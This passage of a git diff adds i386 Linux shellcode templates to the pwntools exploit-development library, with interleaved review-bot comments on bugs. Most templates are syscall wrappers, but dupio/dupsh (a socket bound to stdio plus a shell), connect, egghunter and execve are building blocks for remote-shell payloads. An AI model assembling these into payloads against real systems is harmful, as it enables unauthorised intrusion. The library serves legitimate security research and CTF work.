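Review bot: The docstring of function.asm does not match its `<%page args="name, template_function, *registers"/>` signature: it documents `template_sz(callable)` and `registers(list)`, the first doctest line `shellcraft.function('write', shellcraft.i386.linux.write, )` has a dangling comma and no result, and the later calls `shellcraft.i386.function(hello, 'eax')` pass an already-rendered string as `name` and a register name as `template_function`, so `${template_function(*registers)}` would try to call a string. The Notes section is also cut off mid-sentence at `For example, the pushstr`. Either the signature should become `(template_function, name, *registers)` to match the example, or the example should be rewritten; as written the doctest cannot pass. The `#ifndef`/`#define` guard only has effect if the assembled shellcode is run through the C preprocessor, which the docstring should state.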
diff --git a/pwnlib/shellcraft/templates/i386/getpc.asm b/pwnlib/shellcraft/templates/i386/getpc.asm new file mode 100644 index 000000000..0ca7af15d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/getpc.asm @@ -0,0 +1,12 @@ +<% from pwnlib.shellcraft import i386 %> +<%docstring>Retrieves the value of EIP, stores it in the desired register. + +Args: + return_value: Value to return + +<%page args="register = 'ecx'"/> + + call INC_EBX +.equ INC_EBX, $-1 + ret + pop ${register} diff --git a/pwnlib/shellcraft/templates/i386/itoa.asm b/pwnlib/shellcraft/templates/i386/itoa.asm new file mode 100644 index 000000000..dc36b4088 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/itoa.asm 
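Review bot: The getpc.asm docstring documents a `return_value` argument, but the template's only parameter is `register` (default `'ecx'`), the register that receives the address. It should also state the side effect the label name hints at: `call INC_EBX` targets the last byte of its own encoding, so the trailing 0xFF of the call and the 0xC3 of `ret` execute as `inc ebx`, and `pop ${register}` then receives the return address pushed by the call, i.e. the address of the `ret` byte immediately after the call, not the address of the `pop`. Suggested docstring: `Retrieves the address of the byte following the call (the 'ret' byte) into the given register; clobbers ebx (incremented by one) and leaves the stack unchanged.`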
@@ -0,0 +1,61 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.i386 import mov, pushstr +from pwnlib import constants +%> +<%docstring> +Converts an integer into its string representation, and pushes it +onto the stack. + +Arguments: + v(str, int): + Integer constant or register that contains the value to convert. + alloca + +Example: + + >>> sc = shellcraft.i386.mov('eax', 0xdeadbeef) + >>> sc += shellcraft.i386.itoa('eax') + >>> sc += shellcraft.i386.linux.write(1, 'esp', 32) + >>> run_assembly(sc).recvuntil('\x00') + '3735928559\x00' + +<%page args="v, buffer='esp', allocate_stack=True"/> +<% +itoa_loop = common.label('itoa_loop') +size_loop = common.label('size_loop') + +assert v in registers.i386 +%>\ + /* atoi(${pretty(v,0)}) */ +%if allocate_stack and buffer=='esp': + sub esp, 0x10 +%endif +## We need to know how long the string is, in order for +## the beginning of the string to be *exactly* at esp. + ${mov('edi', buffer)} + ${mov('eax', v)} + push eax /* save for later */ +${size_loop}: + ${mov('edx', 0)} + ${mov('ecx', 10)} + div ecx + inc edi + test eax, eax + jnz ${size_loop} + dec edi +## Now we begin the actual division process + pop eax + ${itoa_loop}: + ${mov('edx', 0)} +## ecx is already 10 + div ecx + add dl, ${ord('0')} + mov BYTE PTR [edi], dl + dec edi + test eax, eax + jnz ${itoa_loop} +## null terminate + ${mov('edx', 0)} + mov BYTE PTR [edi], dl + inc edi diff --git a/pwnlib/shellcraft/templates/i386/linux/accept.asm b/pwnlib/shellcraft/templates/i386/linux/accept.asm new file mode 100644 index 000000000..3be485460 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/accept.asm 
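Review bot: The NUL terminator in itoa.asm is written in front of the string, not after it: the size loop leaves `edi` at buffer+ndigits, the `dec edi` before the digit loop moves it to the last digit slot, and after the digit loop `edi` is buffer-1, so `mov BYTE PTR [edi], dl` stores the zero one byte below the first digit. The doctest presumably passes only because the freshly reserved stack bytes above the string are still zero. Fix: store the terminator while `edi` still points at buffer+ndigits, i.e. before the `dec edi` insert `${mov('edx', 0)}` and `mov BYTE PTR [edi], dl`, and drop the two trailing lines that write through `edi` after the loop (keep the final `inc edi` so `edi` returns to the buffer start). Separately, `assert v in registers.i386` rejects the integer constants the docstring promises to accept, the docstring mentions an `alloca` argument that does not exist (the parameters are `buffer` and `allocate_stack`), and the emitted comment reads `atoi(...)` for an itoa.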
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/access.asm b/pwnlib/shellcraft/templates/i386/linux/access.asm new file mode 100644 index 000000000..89c9078c3 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/i386/linux/acct.asm b/pwnlib/shellcraft/templates/i386/linux/acct.asm new file mode 100644 index 000000000..20fa2be5e --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/i386/linux/alarm.asm b/pwnlib/shellcraft/templates/i386/linux/alarm.asm new file mode 100644 index 000000000..e4ecd8817 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/alarm.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/i386/linux/bind.asm b/pwnlib/shellcraft/templates/i386/linux/bind.asm new file mode 100644 index 000000000..a98f9ef4a --- /dev/null 
+++ b/pwnlib/shellcraft/templates/i386/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/brk.asm b/pwnlib/shellcraft/templates/i386/linux/brk.asm new file mode 100644 index 000000000..0f4ac1c48 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/i386/linux/chdir.asm b/pwnlib/shellcraft/templates/i386/linux/chdir.asm new file mode 100644 index 000000000..f30187663 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/i386/linux/chmod.asm b/pwnlib/shellcraft/templates/i386/linux/chmod.asm new file mode 100644 index 000000000..6e69fa5b4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/i386/linux/chown.asm b/pwnlib/shellcraft/templates/i386/linux/chown.asm new file mode 100644 index 000000000..b89712454 
--- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/i386/linux/chroot.asm b/pwnlib/shellcraft/templates/i386/linux/chroot.asm new file mode 100644 index 000000000..8313b7641 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/i386/linux/clock_getres.asm b/pwnlib/shellcraft/templates/i386/linux/clock_getres.asm new file mode 100644 index 000000000..98886f048 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/i386/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/i386/linux/clock_gettime.asm new file mode 100644 index 000000000..4c2022999 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/clock_gettime.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/i386/linux/clock_nanosleep.asm new file mode 100644 index 000000000..84cf96c8a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/i386/linux/clock_settime.asm b/pwnlib/shellcraft/templates/i386/linux/clock_settime.asm new file mode 100644 index 000000000..ea363b7d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/clone.asm b/pwnlib/shellcraft/templates/i386/linux/clone.asm new file mode 100644 index 000000000..a1ce8c554 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/clone.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/close.asm b/pwnlib/shellcraft/templates/i386/linux/close.asm new file mode 100644 index 000000000..09fe9e2b4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/i386/linux/connect.asm b/pwnlib/shellcraft/templates/i386/linux/connect.asm index 10579ac02..f602f899f 100644 --- a/pwnlib/shellcraft/templates/i386/linux/connect.asm +++ b/pwnlib/shellcraft/templates/i386/linux/connect.asm @@ -1,10 +1,6 @@ -<% from pwnlib.shellcraft import common %> -<% from pwnlib.shellcraft.i386 import push, pushstr %> -<% from pwnlib.shellcraft.i386.linux import syscall %> -<% from pwnlib.constants import SOCK_STREAM, AF_INET, SYS_socketcall, SYS_socketcall_socket, SYS_socketcall_connect %> -<% from socket import htons, inet_aton, gethostbyname %> -<% from pwnlib.util import packing %> -<% from pwnlib.shellcraft import i386 %> +<% from pwnlib.shellcraft.i386 import pushstr %> +<% from pwnlib.shellcraft.i386.linux import socket, socketcall %> +<% from pwnlib.constants import SYS_socketcall_connect %> <% from pwnlib.util.net import sockaddr %> <%page args="host, port, network = 'ipv4'"/> 
@@ -19,7 +15,7 @@ Arguments: Examples: - >>> l = listen(timeout=1) + >>> l = listen(timeout=5) >>> assembly = shellcraft.i386.linux.connect('localhost', l.lport) >>> assembly += shellcraft.i386.pushstr('Hello') >>> assembly += shellcraft.i386.linux.write('edx', 'esp', 5) @@ -27,8 +23,8 @@ Examples: >>> l.wait_for_connection().recv() 'Hello' - >>> l = listen(fam='ipv6', timeout=1) - >>> assembly = shellcraft.i386.linux.connect('localhost', l.lport, 'ipv6') + >>> l = listen(fam='ipv6', timeout=5) + >>> assembly = shellcraft.i386.linux.connect('ip6-localhost', l.lport, 'ipv6') >>> p = run_assembly(assembly) >>> assert l.wait_for_connection() @@ -37,21 +33,13 @@ Examples: sockaddr, length, address_family = sockaddr(host, port, network) %>\ -/* open new socket */ - ${push(0)} - ${push(SOCK_STREAM)} - ${push(address_family)} - ${syscall(SYS_socketcall, SYS_socketcall_socket, 'esp', 0)} - -/* save opened socket */ +/* open new socket, save it */ + ${socket(network)} mov edx, eax /* push sockaddr, connect() */ ${pushstr(sockaddr, False)} mov ecx, esp - ${push(length)} /* socklen_t addrlen */ - push ecx /* sockaddr *addr */ - push edx /* sockfd */ - ${syscall(SYS_socketcall, SYS_socketcall_connect, 'esp')} + ${socketcall(SYS_socketcall_connect, 'edx', 'ecx', length)} /* Socket that is maybe connected is in edx */ diff --git a/pwnlib/shellcraft/templates/i386/linux/creat.asm b/pwnlib/shellcraft/templates/i386/linux/creat.asm new file mode 100644 index 000000000..0af7cd399 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/i386/linux/dir.asm b/pwnlib/shellcraft/templates/i386/linux/dir.asm new file mode 100644 index 000000000..f99383a6e 
--- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/dir.asm @@ -0,0 +1,17 @@ +<% from pwnlib.shellcraft import i386, pretty %> +<%page args="in_fd = 'ebp', size = 0x800, allocate_stack = True"/> +<%docstring> Reads to the stack from a directory. + +Args: + in_fd (int/str): File descriptor to be read from. + size (int): Buffer size. + allocate_stack (bool): allocate 'size' bytes on the stack. + +You can optioanlly shave a few bytes not allocating the stack space. + +The size read is left in eax. + +%if allocate_stack: + sub esp, ${pretty(size)} +%endif + ${i386.linux.getdents(in_fd, 'esp', size)} diff --git a/pwnlib/shellcraft/templates/i386/linux/dup.asm b/pwnlib/shellcraft/templates/i386/linux/dup.asm index 6102fc6f8..48636b70c 100644 --- a/pwnlib/shellcraft/templates/i386/linux/dup.asm +++ b/pwnlib/shellcraft/templates/i386/linux/dup.asm @@ -1,20 +1,13 @@ -<% from pwnlib.shellcraft import i386 %> -<% from pwnlib.shellcraft import common %> -<%page args="sock = 'ebp'"/> -<%docstring> -Args: [sock (imm/reg) = ebp] - Duplicates sock to stdin, stdout and stderr - + <% - dup = common.label("dup") - looplabel = common.label("loop") + from pwnlib.shellcraft.i386.linux import syscall %> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup. See 'man 2 dup' for more information. -${dup}: - ${i386.mov('ebx', sock)} - ${i386.mov('ecx', 3)} -${looplabel}: - dec ecx +Arguments: + fd(int): fd + - ${i386.linux.syscall('SYS_dup2', 'ebx', 'ecx')} - jnz ${looplabel} + ${syscall('SYS_dup', fd)} diff --git a/pwnlib/shellcraft/templates/i386/linux/dup2.asm b/pwnlib/shellcraft/templates/i386/linux/dup2.asm new file mode 100644 index 000000000..067951909 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/dup2.asm 
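Review bot: dup.asm now declares `<%page args="fd, fd2"/>` but only `fd` is documented and only `fd` is passed to `${syscall('SYS_dup', fd)}`; `fd2` looks like a leftover from dup2.asm and, having no default, presumably makes every `dup(fd)` call fail with a missing-argument error. The page line should be `<%page args="fd"/>`. This change also silently repurposes the `dup` name: it used to duplicate a socket onto fds 0-2 (now `dupio`), so any external caller of `shellcraft.i386.linux.dup(sock)` now gets a single raw dup syscall instead; a note in the changelog would help.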
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/i386/linux/dup3.asm b/pwnlib/shellcraft/templates/i386/linux/dup3.asm new file mode 100644 index 000000000..546d89d43 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/dup3.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/dupio.asm b/pwnlib/shellcraft/templates/i386/linux/dupio.asm new file mode 100644 index 000000000..2f12a95d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/dupio.asm @@ -0,0 +1,21 @@ +<% from pwnlib.shellcraft.i386.linux import dup2 %> +<% from pwnlib.shellcraft.i386 import mov %> +<% from pwnlib.shellcraft import common %> +<%page args="sock = 'ebp'"/> +<%docstring> +Args: [sock (imm/reg) = ebp] + Duplicates sock to stdin, stdout and stderr + +<% + dup = common.label("dup") + looplabel = common.label("loop") +%> + +${dup}: + ${mov('ebx', sock)} + ${mov('ecx', 3)} +${looplabel}: + dec ecx + + ${dup2('ebx', 'ecx')} + jnz ${looplabel} diff --git a/pwnlib/shellcraft/templates/i386/linux/dupsh.asm b/pwnlib/shellcraft/templates/i386/linux/dupsh.asm index 583e6daac..7be47ecbf 100644 --- a/pwnlib/shellcraft/templates/i386/linux/dupsh.asm +++ b/pwnlib/shellcraft/templates/i386/linux/dupsh.asm @@ -7,6 +7,6 @@ Args: [sock (imm/reg) = ebp] -${linux.dup(sock)} +${linux.dupio(sock)} ${linux.sh()} diff --git a/pwnlib/shellcraft/templates/i386/linux/echo.asm b/pwnlib/shellcraft/templates/i386/linux/echo.asm index 8b6256d42..62e998b88 100644 
--- a/pwnlib/shellcraft/templates/i386/linux/echo.asm +++ b/pwnlib/shellcraft/templates/i386/linux/echo.asm @@ -1,5 +1,5 @@ <% from pwnlib.shellcraft import i386 %> -<%page args="string, sock = 'ebp'"/> +<%page args="string, sock = '1'"/> <%docstring> Writes a string to a file descriptor diff --git a/pwnlib/shellcraft/templates/i386/linux/egghunter.asm b/pwnlib/shellcraft/templates/i386/linux/egghunter.asm new file mode 100644 index 000000000..663db7bf2 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/egghunter.asm 
@@ -0,0 +1,73 @@ +<% +from pwnlib.shellcraft import i386, pretty, common +from pwnlib.util.packing import pack, unpack +from pwnlib.util.lists import group +from pwnlib import constants, log +%> +<%page args="egg, start_address = 0"/> +<%docstring> +egghunter(egg, start_address = 0) + +Searches memory for the byte sequence 'egg'. + +Return value is the address immediately following the match, +stored in RDI. + +Arguments: + egg(str, int): String of bytes, or word-size integer to search for + start_address(int): Where to start the search + +<% +egghunter_loop = common.label('egghunter_loop') +memcmp = common.label('egghunter_memcmp') +done = common.label('egghunter_done') +next_page = common.label('egghunter_nextpage') + +egg_str = egg +if isinstance(egg, int): + egg_str = pack(egg) + +if len(egg_str) % 4: + log = log.getLogger('pwnlib.shellcraft.templates.i386.linux.egghunter') + log.error("Egg size must be a multiple of four bytes") +%> + cld + ${i386.pushstr(egg_str, False)} +% if start_address: + ${i386.mov('ebx', start_address)} +% endif + +## Search for pages +${egghunter_loop}: + ${i386.linux.access('ebx', 0)} + +## EFAULT == Bad address + cmp al, (-${pretty(constants.EFAULT)}) & 0xff + jz ${next_page} + +## We found a page, scan all of the DWORDs + ${i386.mov('edx', 0x1000/4)} +${memcmp}: + test edx, edx + jz ${next_page} + +## Scan forward by DWORD + ${i386.setregs({'esi':'esp', + 'edi':'ebx', + 'ecx': len(egg_str)/4})} +## Success? + repe cmpsd + jz ${done} + +## Increment the starting point, decement the counter, restart + add ebx, 4 + dec edx + jnz ${memcmp} + +${next_page}: +## Next page + or bx, 0xfff + inc ebx + jmp ${egghunter_loop} +${done}: + diff --git a/pwnlib/shellcraft/templates/i386/linux/epoll_create.asm b/pwnlib/shellcraft/templates/i386/linux/epoll_create.asm new file mode 100644 index 000000000..7d457e7e5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/epoll_create.asm 
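Review bot: With the default `start_address = 0`, the `% if start_address:` guard in egghunter.asm skips `${i386.mov('ebx', start_address)}`, so the search begins at whatever `ebx` held on entry rather than at address 0 as the docstring implies; either default to `None` and test `% if start_address is not None:`, or drop the guard and always initialise ebx. The docstring also says the result is stored in RDI, which is the amd64 wording — on i386 it is EDI (`repe cmpsd` leaves edi just past the match). The `access` probe only validates the page at `ebx`, but the inner scan walks 1024 dwords from there and `repe cmpsd` compares `len(egg)/4` dwords per candidate, so an egg candidate in the last dwords of a page is compared across the boundary and can fault on an unmapped neighbour; bounding the inner count by `(0x1000 - len(egg_str))/4` for page-aligned starts avoids that. `isinstance(egg, int)` also misses Python 2 `long`.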
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/i386/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/i386/linux/epoll_create1.asm new file mode 100644 index 000000000..0b567667a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/i386/linux/epoll_ctl.asm new file mode 100644 index 000000000..68ead556a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/i386/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/i386/linux/epoll_pwait.asm new file mode 100644 index 000000000..f20e57940 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/epoll_pwait.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/i386/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/i386/linux/epoll_wait.asm new file mode 100644 index 000000000..8dc679447 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/i386/linux/execve.asm b/pwnlib/shellcraft/templates/i386/linux/execve.asm new file mode 100644 index 000000000..66c1d79fe --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/execve.asm 
@@ -0,0 +1,47 @@ +<% +from pwnlib.shellcraft import i386, registers +from pwnlib.abi import linux_i386_syscall as abi +%> +<%docstring> +Execute a different process. + +Attempts to perform some automatic detection of types. +Otherwise, the arguments behave as normal. + +- If ``path`` is a string that is not a known register, + it is pushed onto the stack. +- If ``argv`` is an array of strings, it is pushed onto + the stack, and NULL-terminated. +- If ``envp`` is an dictionary of {string:string}, + it is pushed onto the stack, and NULL-terminated. + +Example: + + >>> path = '/bin/sh' + >>> argv = ['sh', '-c', 'echo Hello, $NAME; exit $STATUS'] + >>> envp = {'NAME': 'zerocool', 'STATUS': 3} + >>> sc = shellcraft.i386.linux.execve(path, argv, envp) + >>> io = run_assembly(sc) + >>> io.recvall() + 'Hello, zerocool\n' + >>> io.poll(True) + 3 + +<%page args="path = '/bin///sh', argv=0, envp=0"/> +<% +if isinstance(envp, dict): + envp = ['%s=%s' % (k,v) for (k,v) in envp.items()] +%> +% if isinstance(argv, (list, tuple)): + ${i386.pushstr_array(abi.register_arguments[3], argv)} + <% argv = abi.register_arguments[3] %> +% endif +% if isinstance(envp, (list, tuple)): + ${i386.pushstr_array(abi.register_arguments[2], envp)} + <% envp = abi.register_arguments[2] %> +% endif +% if isinstance(path, str) and not registers.is_register(path): + ${i386.pushstr(path)} + <% path = 'esp' %> +%endif + ${i386.syscall('SYS_execve', path, argv, envp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/faccessat.asm b/pwnlib/shellcraft/templates/i386/linux/faccessat.asm new file mode 100644 index 000000000..1cec1edc5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/faccessat.asm 
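Review bot: In execve.asm the staging registers are reversed relative to the syscall argument order: `argv` is pushed into `abi.register_arguments[3]` and `envp` into `abi.register_arguments[2]`, while the `syscall` template's `dict(zip(registers, arguments))` makes index 2 the first slot after the path (argv) and index 3 the next one (envp). The final `${i386.syscall('SYS_execve', path, argv, envp)}` then has to swap the two registers, so the result is presumably still correct but costs an exchange and reads as if it were wrong; `${i386.pushstr_array(abi.register_arguments[2], argv)}` and `${i386.pushstr_array(abi.register_arguments[3], envp)}` line the staging up with the call. The `isinstance(path, str)` check also excludes `unicode` on Python 2, which cgc/syscall.asm in this same commit handles with `(str, unicode, Constant)`.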
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fallocate.asm b/pwnlib/shellcraft/templates/i386/linux/fallocate.asm new file mode 100644 index 000000000..f5acebb02 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fchdir.asm b/pwnlib/shellcraft/templates/i386/linux/fchdir.asm new file mode 100644 index 000000000..8ad88495d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git 